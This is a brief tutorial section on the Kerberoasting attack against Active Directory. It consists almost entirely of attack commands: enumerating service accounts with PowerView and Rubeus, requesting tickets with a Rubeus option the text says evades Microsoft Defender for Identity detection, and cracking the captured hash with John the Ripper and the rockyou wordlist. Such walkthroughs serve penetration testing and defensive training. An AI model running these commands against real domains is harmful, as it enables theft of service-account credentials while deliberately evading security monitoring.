In this Section, we will discuss the Kerberoasting attack

Enumerating Kerberoastable users using PowerView.

Get-DomainUser -SPN | select samaccountname

Now let’s enumerate the Kerberoastable users using rubeus

.\\Rubeus.exe kerberoast /stats

We got 3 Kerberoastable accounts

The Below command will evade the MDI and will not get detected while Kerberoasting

.\\Rubeus.exe kerberoast /user:serviceaccount /simple /rc4opsec

Now let’s crack the hash with John

john crackme.txt --wordlist=/usr/share/wordlists/rockyou.txt